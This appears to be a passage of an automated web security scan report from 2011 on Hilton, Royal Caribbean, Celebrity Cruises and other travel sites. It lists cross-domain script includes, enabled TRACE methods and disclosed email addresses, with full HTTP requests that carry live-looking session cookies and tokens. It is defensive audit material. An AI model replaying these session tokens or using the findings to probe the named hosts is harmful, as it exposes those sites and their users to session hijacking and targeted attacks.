<?xml version="1.0" encoding="UTF-8"?>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.hotelicopter.com/js/connector.js"></script>
...[SNIP]...
<![if !IE]><script src="http://dev.virtualearth.net/mapcontrol/v6.3/js/atlascompat.js"></script><![endif]>

<script charset="UTF-8" type="text/javascript" src="http://ecn.dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.3&mkt=en-us"></script>
...[SNIP]...
18.68. http://www3.hilton.com/skins/en_US/js_comp/search.comp.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www3.hilton.com
Path:   /skins/en_US/js_comp/search.comp.min.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /skins/en_US/js_comp/search.comp.min.js HTTP/1.1
Host: www3.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www3.hilton.com/en_US/hi/search/findhotels/results.htm?view=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cross-sell=hi; mmcore.tst=0.544; mmid=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; ClrSSID=1317646383790-9086; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635584777:ss=1317635584777; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 28 Sep 2011 17:08:42 GMT
ETag: "f39f-71aada80"
Accept-Ranges: bytes
Content-Type: application/javascript
Vary: Accept-Encoding
Content-Length: 62367
Cache-Control: max-age=44921
Expires: Tue, 04 Oct 2011 01:21:36 GMT
Date: Mon, 03 Oct 2011 12:52:55 GMT
Connection: close

/*
* Copyright (c) 2009 John Resig
* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Copyright 2007 Yehuda Katz,
...[SNIP]...
</a>';drawbutton6(a);}}function drawbutton(a){d=new Date();if(isopen(d,timezone,a)){document.write('<script language="JavaScript" src="http://as00.estara.com/as/InitiateCall2.jsp?accountid=20010320"><\/script>
...[SNIP]...
19. TRACE method is enabled  previous  next
There are 2 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

19.1. https://secure2.hilton.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure2.hilton.com
Path:   /

Request

TRACE / HTTP/1.0
Host: secure2.hilton.com
Cookie: 23efcbb40ef95a74

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:57:42 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: secure2.hilton.com
Cookie: 23efcbb40ef95a74; JSESSIONID=9A01C76E93C4F83F0100CE2C22AE52F0.tc12; BetaCookie=Y; cross-sell=hi; mmcore.srv=cg1.usw; ClrCSTO=T; ClrSSID=1317646383790-9086; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; co
...[SNIP]...
19.2. http://www.grandcafe-sf.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.grandcafe-sf.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.grandcafe-sf.com
Cookie: 1b7210968ef4f1c4

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:54:40 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.grandcafe-sf.com
Cookie: 1b7210968ef4f1c4

20. Email addresses disclosed  previous  next
There are 286 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

20.1. http://bstats.adbrite.com/adserver/behavioral-data/0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bstats.adbrite.com
Path:   /adserver/behavioral-data/0

Issue detail

The following email address was disclosed in the response:

Request

GET /adserver/behavioral-data/0?d=48380967;bapid=12761;uid=1043107 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=2010860;type=2010c219;cat=fl_ho038;ord=5806069097016.007?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; untarget=1; geo="1%3AJY5LDoIwEEDv0q2ftPQ77IwXMEEPgOUTEwEDVQOEuzszbl5eX9tpV%2FFRIl%2FF8niJXIBVUu2ImumY4YBUXJQl19w1dw3khm%2BZQLSSuuPiDNFLZkbd8xzgM8C74MRepAWfvxRX1Gro0KehSc9yrsdjxDXWrsQapEfvv2mm76LG4Y1yK6jW6d%2FGtkc5n1CnR4sqwcfgG7hLaKLX1sVQZSBdU1daW6PFtv0A"; b="%3A%3A13wid%2C13beg%2C15sx4"; vsd=0@1@4e891585@ads.pubmatic.com

Response

HTTP/1.1 200 OK
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: vsd=0@2@4e89aeca@fls.doubleclick.net; path=/; domain=.adbrite.com; expires=Wed, 05-Oct-2011 12:47:06 GMT
Content-Type: image/gif
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 03 Oct 2011 12:47:06 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
20.2. https://secure.royalcaribbean.com/css/no_hp_screen.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.royalcaribbean.com
Path:   /css/no_hp_screen.css

Issue detail

The following email address was disclosed in the response:

Request

GET /css/no_hp_screen.css HTTP/1.1
Host: secure.royalcaribbean.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://secure.royalcaribbean.com/beforeyouboard/getCountdownToCruise.do?cS=NAVBAR&pnav=4&snav=6
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000Hnty0rieXZnxmfuPhXDAbub:12h3g0fq2; wuc=USA; MSIE_ALERT=true; s_cc=true; s_sq=royalcaribbeanprod%3D%2526pid%253DRCI%25253Adealsandmore%25253Ahotdeals%25253Ahotdealsgateway%2526pidt%253D1%2526oid%253Dhttps%25253A%25252F%25252Fsecure.royalcaribbean.com%25252Fbeforeyouboard%25252FgetCountdownToCruise.do%25253FcS%25253DNAVBAR%252526pnav%25253D4%252526snav%25253D6%2526ot%253DA; secure_token_id=H884J0C3E4

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Tue, 21 Dec 2010 03:50:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9142
Content-Type: text/css
Cache-Control: max-age=122530
Expires: Tue, 04 Oct 2011 22:47:52 GMT
Date: Mon, 03 Oct 2011 12:45:42 GMT
Connection: keep-alive

/* @override
   http://new_royal/css/screen.css
   http://royal.micstura-hosting.com/css/screen.css
   http://new_royal/css/screen.css
   http://royal_final/css/screen.css
*/

/* --------------------------------------------------------------

Title:        Master styles for screen media

Author:        Fabian Socarras - fsocarras@micstura.com
Client:        Royal Caribbean International
Project:        Royal Caribbean Home Page Redesign
Date:        Tuesday; September 8, 2009

Version:        1.0

---------------------------------------------------
...[SNIP]...
20.3. https://secure.royalcaribbean.com/js/jquery.colorbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.royalcaribbean.com
Path:   /js/jquery.colorbox.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/jquery.colorbox.js HTTP/1.1
Host: secure.royalcaribbean.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://secure.royalcaribbean.com/beforeyouboard/getCountdownToCruise.do?cS=NAVBAR&pnav=4&snav=6
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000Hnty0rieXZnxmfuPhXDAbub:12h3g0fq2; wuc=USA; MSIE_ALERT=true; s_cc=true; s_sq=royalcaribbeanprod%3D%2526pid%253DRCI%25253Adealsandmore%25253Ahotdeals%25253Ahotdealsgateway%2526pidt%253D1%2526oid%253Dhttps%25253A%25252F%25252Fsecure.royalcaribbean.com%25252Fbeforeyouboard%25252FgetCountdownToCruise.do%25253FcS%25253DNAVBAR%252526pnav%25253D4%252526snav%25253D6%2526ot%253DA; secure_token_id=H884J0C3E4

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Tue, 21 Dec 2010 03:50:05 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 23267
Content-Type: application/x-javascript
Cache-Control: max-age=122516
Expires: Tue, 04 Oct 2011 22:47:40 GMT
Date: Mon, 03 Oct 2011 12:45:44 GMT
Connection: keep-alive

// ColorBox v1.3.9 - a full featured, light-weight, customizable lightbox based on jQuery 1.3
// c) 2009 Jack Moore - www.colorpowered.com - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function ($, window) {
   
   var
   // ColorBox Default Settings.    
   // See http://colorpowered.com/colorbox for detail
...[SNIP]...
20.4. https://secure.royalcaribbean.com/mycruises/login.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.royalcaribbean.com
Path:   /mycruises/login.do

Issue detail

The following email address was disclosed in the response:

Request

GET /mycruises/login.do?default=false&cS=MHDR HTTP/1.1
Host: secure.royalcaribbean.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://secure.royalcaribbean.com/mycruises/processBookingLookup.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000Hnty0rieXZnxmfuPhXDAbub:12h3g0fq2; wuc=USA; MSIE_ALERT=true; secure_token_id=H884J0C3E4; s_cc=true; s_sq=royalcaribbeanprod%3D%2526pid%253DRCI%25253Abeforeyouboard%25253AgetCountdownToCruise%25253Acountdowntocruiseloggedout%2526pidt%253D1%2526oid%253Dhttps%25253A%25252F%25252Fsecure.royalcaribbean.com%25252Fmycruises%25252Flogin.do%25253Fdefault%25253Dfalse%252526cS%25253DMHDR%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:51:50 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Content-Length: 235364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">


                                   <!
...[SNIP]...
yal/css/screen.css
   http://royal_final/css/screen.css
*/

/* --------------------------------------------------------------

Title:        Master styles for screen media

Author:        Fabian Socarras - fsocarras@micstura.com
Client:        Royal Caribbean International
Project:        Royal Caribbean Home Page Redesign
Date:        Tuesday; September 8, 2009

Version:        1.0

---------------------------------------------------
...[SNIP]...
20.5. https://secure3.hilton.com/skins/common/js_comp/r1core.comp.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure3.hilton.com
Path:   /skins/common/js_comp/r1core.comp.min.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /skins/common/js_comp/r1core.comp.min.js HTTP/1.1
Host: secure3.hilton.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://secure3.hilton.com/en_US/hi/reservation/book.htm;jsessionid=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149?execution=e1s1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.825; mmid=347472783%7CAwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=347472783%7CAwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635647394:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 28 Sep 2011 17:08:38 GMT
ETag: "2fff0-716dd180"
Accept-Ranges: bytes
Content-Length: 196592
Content-Type: application/javascript
Expires: Mon, 03 Oct 2011 12:53:59 GMT
Date: Mon, 03 Oct 2011 12:53:59 GMT
Connection: keep-alive

/*
* Copyright (c) 2009 John Resig
* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Copyright 2007 Yehuda Katz, Rein Henrichs
* Copyright (c) 2007 cody lindley
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and G
...[SNIP]...
20.6. https://secure3.hilton.com/skins/common/js_comp/tracking.comp.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure3.hilton.com
Path:   /skins/common/js_comp/tracking.comp.min.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /skins/common/js_comp/tracking.comp.min.js HTTP/1.1
Host: secure3.hilton.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://secure3.hilton.com/en_US/hi/reservation/book.htm;jsessionid=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149?execution=e1s1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.825; mmid=347472783%7CAwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=347472783%7CAwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635647394:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 28 Sep 2011 17:08:39 GMT
ETag: "972c-717d13c0"
Accept-Ranges: bytes
Content-Length: 38700
Content-Type: application/javascript
Cache-Control: max-age=23800
Expires: Mon, 03 Oct 2011 19:30:39 GMT
Date: Mon, 03 Oct 2011 12:53:59 GMT
Connection: keep-alive

/*
* Copyright (c) 2009 John Resig
* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Copyright 2007 Yehuda Katz, Rein Henrichs
* Copyright (c) 2007 cody lindley
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and G
...[SNIP]...
20.7. https://secure3.hilton.com/skins/en_US/js_comp/reservation.comp.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure3.hilton.com
Path:   /skins/en_US/js_comp/reservation.comp.min.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /skins/en_US/js_comp/reservation.comp.min.js HTTP/1.1
Host: secure3.hilton.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://secure3.hilton.com/en_US/hi/reservation/book.htm;jsessionid=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149?execution=e1s1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.825; mmid=347472783%7CAwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=347472783%7CAwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635647394:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 28 Sep 2011 17:08:41 GMT
ETag: "d4be-719b9840"
Accept-Ranges: bytes
Content-Length: 54462
Content-Type: application/javascript
Expires: Mon, 03 Oct 2011 12:53:59 GMT
Date: Mon, 03 Oct 2011 12:53:59 GMT
Connection: keep-alive

/*
* Copyright (c) 2009 John Resig
* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Copyright 2007 Yehuda Katz, Rein Henrichs
* Copyright (c) 2007 cody lindley
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and G
...[SNIP]...
20.8. http://www.celebritycruises.com/booking/getGuestCountReservationStep1.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celebritycruises.com
Path:   /booking/getGuestCountReservationStep1.do

Issue detail

The following email address was disclosed in the response:

Request

GET /booking/getGuestCountReservationStep1.do?cabincls=B&sailDate=1120513&br=C&packageCode=CN07A074&destCode=ALCAN&shipCode=CN&embarcationPortCode=YVR&returnQuery=isWidget%3Dfalse%26dest%3DANY%26sailStartDate%3DANY%26sailEndDate%3DANY%26ship%3DANY%26port%3DANY%26duration%3DANY%26includeAdjascentPorts%3DY%26promoid%3D%26promoType%3D%26promotionTypeId%3D%26priceProgram%3D%26sortBy%3D4%26startRow%3D0%26count%3D10%26cruiseType%3DCO%26cruiseInt%3DY%26isCrieriaExcluded%3Dfalse%23isWidget%3Dfalse%26dest%3DANY%26sailStartDate%3DANY%26sailEndDate%3DANY%26ship%3DANY%26port%3DANY%26duration%3DANY%26includeAdjascentPorts%3DY%26promoid%3D%26promoType%3D%26promotionTypeId%3D%26priceProgram%3D%26sortBy%3D4%26startRow%3D0%26count%3D10%26cruiseType%3DCO%26cruiseInt%3DY%26isCrieriaExcluded%3Dfalse HTTP/1.1
Host: www.celebritycruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.celebritycruises.com/search/vacationSearchResults.do?isWidget=false&dest=ANY&sailStartDate=ANY&sailEndDate=ANY&ship=ANY&port=ANY&duration=ANY&includeAdjascentPorts=Y&promoid=&promoType=&promotionTypeId=&priceProgram=&sortBy=4&startRow=0&count=10&cruiseType=CO&cruiseInt=Y&isCrieriaExcluded=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=000052bP0YHmMBHoM8_sGg4WKHr:12hdbd027; wuc=USA; s_pers=%20s_evar44cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043868'%255D%255D%7C1475498843868%3B%20s_evar46cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043871'%255D%255D%7C1475498843871%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dcelebritycruiseprod%253D%252526pid%25253Dsearch%2525253A%25252520vacationsearchresults%2525253A%25252520planandbook%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.celebritycruises.com%2525252F%25252523%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en
Vary: Accept-Encoding
Content-Length: 32634
Date: Mon, 03 Oct 2011 12:47:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


   <html class="no-js" lang="en">
<head>

   
<title>Depart
...[SNIP]...
<a href="mailto:choiceair@celebrity.com">choiceair@celebrity.com</a>
...[SNIP]...
20.9. http://www.celebritycruises.com/js/booking_redesign/libs/jquery.colorbox-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celebritycruises.com
Path:   /js/booking_redesign/libs/jquery.colorbox-min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/booking_redesign/libs/jquery.colorbox-min.js HTTP/1.1
Host: www.celebritycruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.celebritycruises.com/booking/getGuestCountReservationStep1.do?cabincls=B&sailDate=1120513&br=C&packageCode=CN07A074&destCode=ALCAN&shipCode=CN&embarcationPortCode=YVR&returnQuery=isWidget%3Dfalse%26dest%3DANY%26sailStartDate%3DANY%26sailEndDate%3DANY%26ship%3DANY%26port%3DANY%26duration%3DANY%26includeAdjascentPorts%3DY%26promoid%3D%26promoType%3D%26promotionTypeId%3D%26priceProgram%3D%26sortBy%3D4%26startRow%3D0%26count%3D10%26cruiseType%3DCO%26cruiseInt%3DY%26isCrieriaExcluded%3Dfalse%23isWidget%3Dfalse%26dest%3DANY%26sailStartDate%3DANY%26sailEndDate%3DANY%26ship%3DANY%26port%3DANY%26duration%3DANY%26includeAdjascentPorts%3DY%26promoid%3D%26promoType%3D%26promotionTypeId%3D%26priceProgram%3D%26sortBy%3D4%26startRow%3D0%26count%3D10%26cruiseType%3DCO%26cruiseInt%3DY%26isCrieriaExcluded%3Dfalse
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=000052bP0YHmMBHoM8_sGg4WKHr:12hdbd027; wuc=USA; s_pers=%20s_evar44cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043868'%255D%255D%7C1475498843868%3B%20s_evar46cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043871'%255D%255D%7C1475498843871%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dcelebritycruiseprod%253D%252526pid%25253Dsearch%2525253A%25252520vacationsearchresults%2525253A%25252520planandbook%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.celebritycruises.com%2525252F%25252523%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Tue, 02 Aug 2011 04:27:46 GMT
ETag: "62bf9-23e8-2b673480"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 9192
Cache-Control: max-age=380988
Expires: Fri, 07 Oct 2011 22:37:16 GMT
Date: Mon, 03 Oct 2011 12:47:28 GMT
Connection: close

// ColorBox v1.3.15 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+
// Copyright (c) 2010 Jack Moore - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function(b,ib){var t="none",M="LoadedContent",c=false,v="resize.",o="y",q="auto",e=true,L="nofollow",m="x";functi
...[SNIP]...
20.10. http://www.celebritycruises.com/js/lib/plugins/jquery.cookie-1.0.0.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celebritycruises.com
Path:   /js/lib/plugins/jquery.cookie-1.0.0.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/lib/plugins/jquery.cookie-1.0.0.js HTTP/1.1
Host: www.celebritycruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.celebritycruises.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=000052bP0YHmMBHoM8_sGg4WKHr:12hdbd027; wuc=USA

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 03 Jan 2011 18:59:15 GMT
ETag: "57265-1096-bf8de6c0"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 4246
Cache-Control: max-age=374485
Expires: Fri, 07 Oct 2011 20:48:28 GMT
Date: Mon, 03 Oct 2011 12:47:03 GMT
Connection: close

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...
20.11. http://www.cruises.com/Code/JavaScript/general/msgbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /Code/JavaScript/general/msgbox.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Code/JavaScript/general/msgbox.js HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruises.com/cs/default.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
